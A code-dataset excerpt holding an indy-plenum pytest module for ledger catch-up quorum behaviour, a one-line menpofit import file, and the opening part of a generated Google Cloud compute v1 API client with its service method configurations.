13b7aac30c15112a1d7c823a8effa406a9ae3561 | 13,057 | py | Python | plenum/test/node_catchup/test_same_ledger_initial_catchup.py | rhzs/indy-plenum | a1ee6f3d081e802b404637026dc6f8ef3ec82a40 | [
"Apache-2.0"
] | null | null | null | plenum/test/node_catchup/test_same_ledger_initial_catchup.py | rhzs/indy-plenum | a1ee6f3d081e802b404637026dc6f8ef3ec82a40 | [
"Apache-2.0"
] | null | null | null | plenum/test/node_catchup/test_same_ledger_initial_catchup.py | rhzs/indy-plenum | a1ee6f3d081e802b404637026dc6f8ef3ec82a40 | [
"Apache-2.0"
] | 1 | 2020-01-24T09:36:13.000Z | 2020-01-24T09:36:13.000Z | import pytest
# noinspection PyUnresolvedReferences
from ledger.test.conftest import tempdir, txn_serializer, hash_serializer # noqa
from plenum.common.constants import LedgerState
from plenum.common.messages.node_messages import LedgerStatus
# Pool size consumed by the txnPoolNodeSet fixture; with 7 nodes the
# same-status quorum exercised below is n - f - 1 = 4 (see test docstrings).
nodeCount = 7
# Ledger id used by every test in this module.
ledger_id = 1
# @pytest.yield_fixture is a deprecated alias and the function returns rather
# than yields, so the plain @pytest.fixture decorator is the correct one.
@pytest.fixture(scope="function")
def node_and_ledger_info(txnPoolNodeSet):
    '''
    Emulate restart of the node (clean state).

    Returns a tuple (node, ledger_manager, ledger_info, ledger_status) for the
    first pool node with catch-up state reset to "just started".
    '''
    node = txnPoolNodeSet[0]
    node.master_replica.last_ordered_3pc = (0, 0)

    view_changer = node.view_changer
    view_changer.propagate_primary = True
    view_changer.view_no = 0
    view_changer.view_change_in_progress = True
    view_changer.set_defaults()

    ledger_manager = node.ledgerManager
    ledger_manager.last_caught_up_3PC = (0, 0)

    ledger_info = ledger_manager.getLedgerInfoByType(ledger_id)
    ledger_info.set_defaults()
    ledger_info.canSync = True

    ledger_status = node.build_ledger_status(ledger_id)
    # A freshly restarted node has not ordered anything: 3PC key is None/None.
    assert ledger_status.viewNo is None
    assert ledger_status.ppSeqNo is None

    return node, ledger_manager, ledger_info, ledger_status
def test_same_ledger_status_quorum(txnPoolNodeSet,
                                   node_and_ledger_info):
    '''
    Check that we require at least n-f-1 (=4) same LedgerStatus msgs
    to finish CatchUp
    '''
    node, ledger_manager, ledger_info, ledger_status = node_and_ledger_info

    status_from = set()
    # Feed three identical statuses: quorum (4) is not reached yet, so the
    # ledger stays unsynced and the senders accumulate in ledgerStatusOk.
    for i in range(3):
        node_name = txnPoolNodeSet[i + 1].name
        ledger_manager.processLedgerStatus(ledger_status, node_name)
        status_from = status_from.union({node_name})
        assert ledger_info.ledgerStatusOk == status_from
        assert ledger_info.canSync is True
        assert ledger_info.state == LedgerState.not_synced

    # The fourth identical status completes the quorum: catch-up finishes and
    # the accumulated sender set is cleared.
    node_name = txnPoolNodeSet[4].name
    ledger_manager.processLedgerStatus(ledger_status, node_name)
    assert ledger_info.ledgerStatusOk == set()
    assert ledger_info.canSync is False
    assert ledger_info.state == LedgerState.synced
def test_same_ledger_status_last_ordered_same_3PC(txnPoolNodeSet,
                                                  node_and_ledger_info):
    '''
    Check that last_ordered_3PC is set according to 3PC from LedgerStatus msgs
    if all LedgerStatus msgs have the same not None 3PC keys
    '''
    node, ledger_manager, ledger_info, ledger_status_none_3PC = node_and_ledger_info

    # Renamed from the misleading `ledger_status_2_40`: the 3PC key carried
    # (and asserted below) is (2, 20).
    ledger_status_2_20 = LedgerStatus(ledger_status_none_3PC.ledgerId,
                                      ledger_status_none_3PC.txnSeqNo,
                                      2, 20,
                                      ledger_status_none_3PC.merkleRoot)

    ledger_manager.processLedgerStatus(ledger_status_2_20, txnPoolNodeSet[1].name)
    ledger_manager.processLedgerStatus(ledger_status_2_20, txnPoolNodeSet[2].name)
    ledger_manager.processLedgerStatus(ledger_status_2_20, txnPoolNodeSet[3].name)
    # Three statuses: same-status quorum not yet reached, nothing applied.
    assert node.master_last_ordered_3PC == (0, 0)
    assert ledger_info.state == LedgerState.not_synced

    # Fourth status completes the quorum; the common (2, 20) key is adopted.
    ledger_manager.processLedgerStatus(ledger_status_2_20, txnPoolNodeSet[4].name)
    assert node.master_last_ordered_3PC == (2, 20)
    assert ledger_info.state == LedgerState.synced
def test_same_ledger_status_last_ordered_same_None_3PC(txnPoolNodeSet,
                                                       node_and_ledger_info):
    '''
    Check that last_ordered_3PC is set according to 3PC from LedgerStatus msgs
    if all LedgerStatus msgs have the same None 3PC keys (like at the initial start of the pool)
    '''
    node, ledger_manager, ledger_info, ledger_status_none_3PC = node_and_ledger_info

    ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[1].name)
    ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[2].name)
    ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[3].name)
    # Three statuses: quorum not yet reached.
    assert node.master_last_ordered_3PC == (0, 0)
    assert ledger_info.state == LedgerState.not_synced

    # Quorum reached, but all keys were None, so last_ordered_3PC stays (0, 0).
    ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[4].name)
    assert node.master_last_ordered_3PC == (0, 0)
    assert ledger_info.state == LedgerState.synced
def test_same_ledger_status_last_ordered_one_not_none_3PC_last(txnPoolNodeSet,
                                                               node_and_ledger_info):
    '''
    Check that last_ordered_3PC is set according to 3PC from LedgerStatus msgs
    if all LedgerStatus msgs have the same None 3PC keys except the last one.
    The last msg contains not None 3PC, but it's not enough for setting last_ordered_3PC
    since the quorum is f+1 (=3)
    '''
    node, ledger_manager, ledger_info, ledger_status_none_3PC = node_and_ledger_info

    ledger_status_3_40 = LedgerStatus(ledger_status_none_3PC.ledgerId,
                                      ledger_status_none_3PC.txnSeqNo,
                                      3, 40,
                                      ledger_status_none_3PC.merkleRoot)

    ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[1].name)
    ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[2].name)
    ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[3].name)
    assert node.master_last_ordered_3PC == (0, 0)
    assert ledger_info.state == LedgerState.not_synced

    # Only one (3, 40) status: below the f+1 (=3) key quorum, so it is ignored.
    ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[4].name)
    assert node.master_last_ordered_3PC == (0, 0)
    assert ledger_info.state == LedgerState.synced
def test_same_ledger_status_last_ordered_one_not_none_3PC_first(txnPoolNodeSet,
                                                                node_and_ledger_info):
    '''
    Check that last_ordered_3PC is set according to 3PC from LedgerStatus msgs
    if all LedgerStatus msgs have the same None 3PC keys except the first one.
    The first msg contains not None 3PC, but it's not enough for setting last_ordered_3PC
    since the quorum is f+1 (=3)
    '''
    node, manager, info, status_none = node_and_ledger_info

    # One status carrying a concrete (3, 40) 3PC key, same ledger/txn/root.
    status_with_key = LedgerStatus(status_none.ledgerId,
                                   status_none.txnSeqNo,
                                   3, 40,
                                   status_none.merkleRoot)

    # First status has the key; the following two do not.
    manager.processLedgerStatus(status_with_key, txnPoolNodeSet[1].name)
    manager.processLedgerStatus(status_none, txnPoolNodeSet[2].name)
    manager.processLedgerStatus(status_none, txnPoolNodeSet[3].name)
    assert node.master_last_ordered_3PC == (0, 0)
    assert info.state == LedgerState.not_synced

    # Quorum of same statuses reached, but the lone keyed status is below the
    # f+1 (=3) key quorum, so last_ordered_3PC is left untouched.
    manager.processLedgerStatus(status_none, txnPoolNodeSet[4].name)
    assert node.master_last_ordered_3PC == (0, 0)
    assert info.state == LedgerState.synced
def test_same_ledger_status_last_ordered_not_none_3PC_quorum_with_none(txnPoolNodeSet,
                                                                       node_and_ledger_info):
    '''
    Check that last_ordered_3PC is set according to 3PC from LedgerStatus msgs
    if all LedgerStatus msgs have the same not None 3PC keys except the last one.
    The last msg contains None 3PC, but not None from the previous msgs is used
    since we have a quorum of f+1 (=3)
    '''
    node, ledger_manager, ledger_info, ledger_status_none_3PC = node_and_ledger_info

    ledger_status_3_40 = LedgerStatus(ledger_status_none_3PC.ledgerId,
                                      ledger_status_none_3PC.txnSeqNo,
                                      3, 40,
                                      ledger_status_none_3PC.merkleRoot)

    ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[1].name)
    ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[2].name)
    ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[3].name)
    assert node.master_last_ordered_3PC == (0, 0)
    assert ledger_info.state == LedgerState.not_synced

    # Three (3, 40) statuses already satisfy the f+1 key quorum, so the None
    # key in the last message does not prevent adopting (3, 40).
    ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[4].name)
    assert node.master_last_ordered_3PC == (3, 40)
    assert ledger_info.state == LedgerState.synced
def test_same_ledger_status_last_ordered_not_none_3PC_quorum1(txnPoolNodeSet,
                                                              node_and_ledger_info):
    '''
    Check that last_ordered_3PC is set according to 3PC from LedgerStatus msgs
    if all LedgerStatus msgs have the same not None 3PC keys except the last one.
    The last msg contains a different not None 3PC, but 3PC from the previous msgs is used
    since we have a quorum of f+1 (=3)
    '''
    node, ledger_manager, ledger_info, ledger_status_none_3PC = node_and_ledger_info

    ledger_status_1_10 = LedgerStatus(ledger_status_none_3PC.ledgerId,
                                      ledger_status_none_3PC.txnSeqNo,
                                      1, 10,
                                      ledger_status_none_3PC.merkleRoot)
    ledger_status_3_40 = LedgerStatus(ledger_status_none_3PC.ledgerId,
                                      ledger_status_none_3PC.txnSeqNo,
                                      3, 40,
                                      ledger_status_none_3PC.merkleRoot)

    ledger_manager.processLedgerStatus(ledger_status_1_10, txnPoolNodeSet[1].name)
    ledger_manager.processLedgerStatus(ledger_status_1_10, txnPoolNodeSet[2].name)
    ledger_manager.processLedgerStatus(ledger_status_1_10, txnPoolNodeSet[3].name)
    assert node.master_last_ordered_3PC == (0, 0)
    assert ledger_info.state == LedgerState.not_synced

    # (1, 10) already has an f+1 quorum; the dissenting (3, 40) is ignored.
    ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[4].name)
    assert node.master_last_ordered_3PC == (1, 10)
    assert ledger_info.state == LedgerState.synced
def test_same_ledger_status_last_ordered_not_none_3PC_quorum2(txnPoolNodeSet,
                                                              node_and_ledger_info):
    '''
    Check that last_ordered_3PC is set according to 3PC from LedgerStatus msgs
    if all LedgerStatus msgs have the same not None 3PC keys except the last one.
    The last msg contains a different not None 3PC, but 3PC from the previous msgs is used
    since we have a quorum of f+1 (=3)
    '''
    node, ledger_manager, ledger_info, ledger_status_none_3PC = node_and_ledger_info

    ledger_status_1_10 = LedgerStatus(ledger_status_none_3PC.ledgerId,
                                      ledger_status_none_3PC.txnSeqNo,
                                      1, 10,
                                      ledger_status_none_3PC.merkleRoot)
    ledger_status_3_40 = LedgerStatus(ledger_status_none_3PC.ledgerId,
                                      ledger_status_none_3PC.txnSeqNo,
                                      3, 40,
                                      ledger_status_none_3PC.merkleRoot)

    ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[1].name)
    ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[2].name)
    ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[3].name)
    assert node.master_last_ordered_3PC == (0, 0)
    assert ledger_info.state == LedgerState.not_synced

    # (3, 40) already has an f+1 quorum; the dissenting (1, 10) is ignored.
    ledger_manager.processLedgerStatus(ledger_status_1_10, txnPoolNodeSet[4].name)
    assert node.master_last_ordered_3PC == (3, 40)
    assert ledger_info.state == LedgerState.synced
def test_same_ledger_status_last_ordered_not_none_3PC_no_quorum_equal(txnPoolNodeSet,
                                                                      node_and_ledger_info):
    '''
    Check that last_ordered_3PC is set according to 3PC from LedgerStatus msgs.
    Check that if we have no quorum (2 different keys, but 3 is required for quorum), then
    they are not used.
    '''
    node, ledger_manager, ledger_info, ledger_status_none_3PC = node_and_ledger_info

    ledger_status_1_10 = LedgerStatus(ledger_status_none_3PC.ledgerId,
                                      ledger_status_none_3PC.txnSeqNo,
                                      1, 10,
                                      ledger_status_none_3PC.merkleRoot)
    ledger_status_3_40 = LedgerStatus(ledger_status_none_3PC.ledgerId,
                                      ledger_status_none_3PC.txnSeqNo,
                                      3, 40,
                                      ledger_status_none_3PC.merkleRoot)

    # 2 x (3, 40) and 2 x (1, 10): neither key reaches the required quorum of 3.
    ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[1].name)
    ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[2].name)
    ledger_manager.processLedgerStatus(ledger_status_1_10, txnPoolNodeSet[3].name)
    assert node.master_last_ordered_3PC == (0, 0)
    assert ledger_info.state == LedgerState.not_synced

    ledger_manager.processLedgerStatus(ledger_status_1_10, txnPoolNodeSet[4].name)
    assert node.master_last_ordered_3PC == (0, 0)
    assert ledger_info.state == LedgerState.synced
| 47.137184 | 96 | 0.691353 | 1,616 | 13,057 | 5.227723 | 0.08354 | 0.137784 | 0.092803 | 0.110204 | 0.863163 | 0.852628 | 0.844579 | 0.825639 | 0.810014 | 0.788352 | 0 | 0.033146 | 0.249062 | 13,057 | 276 | 97 | 47.307971 | 0.828455 | 0.152409 | 0 | 0.684524 | 0 | 0 | 0.000738 | 0 | 0 | 0 | 0 | 0 | 0.238095 | 1 | 0.059524 | false | 0 | 0.02381 | 0 | 0.089286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13d80af739ee073afce7f8822f149ba348f1c2a3 | 63 | py | Python | menpofit/clm/algorithm/__init__.py | yuxiang-zhou/menpofit | a74d87df8979c683019ea518bcf7729a76cc603d | [
"BSD-3-Clause"
] | 220 | 2019-09-01T01:52:04.000Z | 2022-03-28T12:52:07.000Z | menpofit/clm/algorithm/__init__.py | yuxiang-zhou/menpofit | a74d87df8979c683019ea518bcf7729a76cc603d | [
"BSD-3-Clause"
] | 80 | 2015-01-05T16:17:39.000Z | 2020-11-22T13:42:00.000Z | menpofit/clm/algorithm/__init__.py | yuxiang-zhou/menpofit | a74d87df8979c683019ea518bcf7729a76cc603d | [
"BSD-3-Clause"
] | 64 | 2015-02-02T15:11:38.000Z | 2022-02-28T06:19:31.000Z | from .gd import ActiveShapeModel, RegularisedLandmarkMeanShift
| 31.5 | 62 | 0.888889 | 5 | 63 | 11.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.079365 | 63 | 1 | 63 | 63 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
13e3fad8fd603fa4143e12776396c07d3b3aafa9 | 334,389 | py | Python | google-cloud-sdk/lib/googlecloudsdk/third_party/apis/compute/v1/compute_v1_client.py | bopopescu/searchparty | afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6 | [
"Apache-2.0"
] | null | null | null | google-cloud-sdk/lib/googlecloudsdk/third_party/apis/compute/v1/compute_v1_client.py | bopopescu/searchparty | afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6 | [
"Apache-2.0"
] | null | null | null | google-cloud-sdk/lib/googlecloudsdk/third_party/apis/compute/v1/compute_v1_client.py | bopopescu/searchparty | afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6 | [
"Apache-2.0"
] | 3 | 2017-07-27T18:44:13.000Z | 2020-07-25T17:48:53.000Z | """Generated client library for compute version v1."""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.compute.v1 import compute_v1_messages as messages
class ComputeV1(base_api.BaseApiClient):
  """Generated client library for service compute version v1."""

  # Module containing all generated request/response message classes.
  MESSAGES_MODULE = messages
  BASE_URL = u'https://www.googleapis.com/compute/v1/'

  _PACKAGE = u'compute'
  # OAuth2 scopes this client may request when obtaining credentials.
  _SCOPES = [u'https://www.googleapis.com/auth/cloud-platform', u'https://www.googleapis.com/auth/compute', u'https://www.googleapis.com/auth/compute.readonly', u'https://www.googleapis.com/auth/devstorage.full_control', u'https://www.googleapis.com/auth/devstorage.read_only', u'https://www.googleapis.com/auth/devstorage.read_write']
  _VERSION = u'v1'
  # NOTE(review): these appear to be the Cloud SDK's shipped installed-app
  # OAuth client values (present verbatim in generated source) — confirm they
  # are the intended public values, not a leaked secret.
  _CLIENT_ID = '1042881264118.apps.googleusercontent.com'
  _CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
  # NOTE(review): user agent string mirrors _CLIENT_SECRET — looks like a
  # generator quirk; confirm upstream before relying on it.
  _USER_AGENT = 'x_Tw5K8nnjoRAqULM9PFAC2b'
  _CLIENT_CLASS_NAME = u'ComputeV1'
  _URL_VERSION = u'v1'
  _API_KEY = None
def __init__(self, url='', credentials=None,
             get_credentials=True, http=None, model=None,
             log_request=False, log_response=False,
             credentials_args=None, default_global_params=None,
             additional_http_headers=None):
  """Create a new compute handle.

  All keyword arguments are forwarded unchanged to
  base_api.BaseApiClient.__init__; ``url`` falls back to BASE_URL when
  empty or not given.
  """
  url = url or self.BASE_URL
  super(ComputeV1, self).__init__(
      url, credentials=credentials,
      get_credentials=get_credentials, http=http, model=model,
      log_request=log_request, log_response=log_response,
      credentials_args=credentials_args,
      default_global_params=default_global_params,
      additional_http_headers=additional_http_headers)
  # Instantiate one service stub per API resource collection, each bound
  # to this client instance.
  self.acceleratorTypes = self.AcceleratorTypesService(self)
  self.addresses = self.AddressesService(self)
  self.autoscalers = self.AutoscalersService(self)
  self.backendBuckets = self.BackendBucketsService(self)
  self.backendServices = self.BackendServicesService(self)
  self.diskTypes = self.DiskTypesService(self)
  self.disks = self.DisksService(self)
  self.firewalls = self.FirewallsService(self)
  self.forwardingRules = self.ForwardingRulesService(self)
  self.globalAddresses = self.GlobalAddressesService(self)
  self.globalForwardingRules = self.GlobalForwardingRulesService(self)
  self.globalOperations = self.GlobalOperationsService(self)
  self.healthChecks = self.HealthChecksService(self)
  self.httpHealthChecks = self.HttpHealthChecksService(self)
  self.httpsHealthChecks = self.HttpsHealthChecksService(self)
  self.images = self.ImagesService(self)
  self.instanceGroupManagers = self.InstanceGroupManagersService(self)
  self.instanceGroups = self.InstanceGroupsService(self)
  self.instanceTemplates = self.InstanceTemplatesService(self)
  self.instances = self.InstancesService(self)
  self.licenses = self.LicensesService(self)
  self.machineTypes = self.MachineTypesService(self)
  self.networks = self.NetworksService(self)
  self.projects = self.ProjectsService(self)
  self.regionAutoscalers = self.RegionAutoscalersService(self)
  self.regionBackendServices = self.RegionBackendServicesService(self)
  self.regionCommitments = self.RegionCommitmentsService(self)
  self.regionInstanceGroupManagers = self.RegionInstanceGroupManagersService(self)
  self.regionInstanceGroups = self.RegionInstanceGroupsService(self)
  self.regionOperations = self.RegionOperationsService(self)
  self.regions = self.RegionsService(self)
  self.routers = self.RoutersService(self)
  self.routes = self.RoutesService(self)
  self.snapshots = self.SnapshotsService(self)
  self.sslCertificates = self.SslCertificatesService(self)
  self.subnetworks = self.SubnetworksService(self)
  self.targetHttpProxies = self.TargetHttpProxiesService(self)
  self.targetHttpsProxies = self.TargetHttpsProxiesService(self)
  self.targetInstances = self.TargetInstancesService(self)
  self.targetPools = self.TargetPoolsService(self)
  self.targetSslProxies = self.TargetSslProxiesService(self)
  self.targetTcpProxies = self.TargetTcpProxiesService(self)
  self.targetVpnGateways = self.TargetVpnGatewaysService(self)
  self.urlMaps = self.UrlMapsService(self)
  self.vpnTunnels = self.VpnTunnelsService(self)
  self.zoneOperations = self.ZoneOperationsService(self)
  self.zones = self.ZonesService(self)
class AcceleratorTypesService(base_api.BaseApiService):
  """Service class for the acceleratorTypes resource.

  Each public method issues one HTTP request; its wire configuration is
  attached as a ``method_config`` attribute and looked up by name through
  ``self.GetMethodConfig``.
  """

  _NAME = u'acceleratorTypes'

  def __init__(self, client):
    super(ComputeV1.AcceleratorTypesService, self).__init__(client)
    # This resource exposes no media-upload methods.
    self._upload_configs = {
        }

  def AggregatedList(self, request, global_params=None):
    """Retrieves an aggregated list of accelerator types.

    Args:
      request: (ComputeAcceleratorTypesAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (AcceleratorTypeAggregatedList) The response message.
    """
    config = self.GetMethodConfig('AggregatedList')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Static HTTP wire metadata for the method above; evaluated lazily.
  AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.acceleratorTypes.aggregatedList',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/aggregated/acceleratorTypes',
      request_field='',
      request_type_name=u'ComputeAcceleratorTypesAggregatedListRequest',
      response_type_name=u'AcceleratorTypeAggregatedList',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified accelerator type. Get a list of available accelerator types by making a list() request.

    Args:
      request: (ComputeAcceleratorTypesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (AcceleratorType) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.acceleratorTypes.get',
      ordered_params=[u'project', u'zone', u'acceleratorType'],
      path_params=[u'acceleratorType', u'project', u'zone'],
      query_params=[],
      relative_path=u'projects/{project}/zones/{zone}/acceleratorTypes/{acceleratorType}',
      request_field='',
      request_type_name=u'ComputeAcceleratorTypesGetRequest',
      response_type_name=u'AcceleratorType',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves a list of accelerator types available to the specified project.

    Args:
      request: (ComputeAcceleratorTypesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (AcceleratorTypeList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.acceleratorTypes.list',
      ordered_params=[u'project', u'zone'],
      path_params=[u'project', u'zone'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/zones/{zone}/acceleratorTypes',
      request_field='',
      request_type_name=u'ComputeAcceleratorTypesListRequest',
      response_type_name=u'AcceleratorTypeList',
      supports_download=False,
  )
class AddressesService(base_api.BaseApiService):
  """Service class for the addresses resource.

  Each public method issues one HTTP request; its wire configuration is
  attached as a ``method_config`` attribute and looked up by name through
  ``self.GetMethodConfig``.
  """

  _NAME = u'addresses'

  def __init__(self, client):
    super(ComputeV1.AddressesService, self).__init__(client)
    # This resource exposes no media-upload methods.
    self._upload_configs = {
        }

  def AggregatedList(self, request, global_params=None):
    """Retrieves an aggregated list of addresses.

    Args:
      request: (ComputeAddressesAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (AddressAggregatedList) The response message.
    """
    config = self.GetMethodConfig('AggregatedList')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Static HTTP wire metadata for the method above; evaluated lazily.
  AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.addresses.aggregatedList',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/aggregated/addresses',
      request_field='',
      request_type_name=u'ComputeAddressesAggregatedListRequest',
      response_type_name=u'AddressAggregatedList',
      supports_download=False,
  )

  def Delete(self, request, global_params=None):
    """Deletes the specified address resource.

    Args:
      request: (ComputeAddressesDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.addresses.delete',
      ordered_params=[u'project', u'region', u'address'],
      path_params=[u'address', u'project', u'region'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/addresses/{address}',
      request_field='',
      request_type_name=u'ComputeAddressesDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified address resource.

    Args:
      request: (ComputeAddressesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Address) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.addresses.get',
      ordered_params=[u'project', u'region', u'address'],
      path_params=[u'address', u'project', u'region'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/addresses/{address}',
      request_field='',
      request_type_name=u'ComputeAddressesGetRequest',
      response_type_name=u'Address',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates an address resource in the specified project using the data included in the request.

    Args:
      request: (ComputeAddressesInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.addresses.insert',
      ordered_params=[u'project', u'region'],
      path_params=[u'project', u'region'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/addresses',
      request_field=u'address',
      request_type_name=u'ComputeAddressesInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves a list of addresses contained within the specified region.

    Args:
      request: (ComputeAddressesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (AddressList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.addresses.list',
      ordered_params=[u'project', u'region'],
      path_params=[u'project', u'region'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/regions/{region}/addresses',
      request_field='',
      request_type_name=u'ComputeAddressesListRequest',
      response_type_name=u'AddressList',
      supports_download=False,
  )
class AutoscalersService(base_api.BaseApiService):
  """Service class for the autoscalers resource.

  Each public method issues one HTTP request; its wire configuration is
  attached as a ``method_config`` attribute and looked up by name through
  ``self.GetMethodConfig``.
  """

  _NAME = u'autoscalers'

  def __init__(self, client):
    super(ComputeV1.AutoscalersService, self).__init__(client)
    # This resource exposes no media-upload methods.
    self._upload_configs = {
        }

  def AggregatedList(self, request, global_params=None):
    """Retrieves an aggregated list of autoscalers.

    Args:
      request: (ComputeAutoscalersAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (AutoscalerAggregatedList) The response message.
    """
    config = self.GetMethodConfig('AggregatedList')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Static HTTP wire metadata for the method above; evaluated lazily.
  AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.autoscalers.aggregatedList',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/aggregated/autoscalers',
      request_field='',
      request_type_name=u'ComputeAutoscalersAggregatedListRequest',
      response_type_name=u'AutoscalerAggregatedList',
      supports_download=False,
  )

  def Delete(self, request, global_params=None):
    """Deletes the specified autoscaler.

    Args:
      request: (ComputeAutoscalersDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.autoscalers.delete',
      ordered_params=[u'project', u'zone', u'autoscaler'],
      path_params=[u'autoscaler', u'project', u'zone'],
      query_params=[],
      relative_path=u'projects/{project}/zones/{zone}/autoscalers/{autoscaler}',
      request_field='',
      request_type_name=u'ComputeAutoscalersDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified autoscaler resource. Get a list of available autoscalers by making a list() request.

    Args:
      request: (ComputeAutoscalersGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Autoscaler) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.autoscalers.get',
      ordered_params=[u'project', u'zone', u'autoscaler'],
      path_params=[u'autoscaler', u'project', u'zone'],
      query_params=[],
      relative_path=u'projects/{project}/zones/{zone}/autoscalers/{autoscaler}',
      request_field='',
      request_type_name=u'ComputeAutoscalersGetRequest',
      response_type_name=u'Autoscaler',
      supports_download=False,
  )

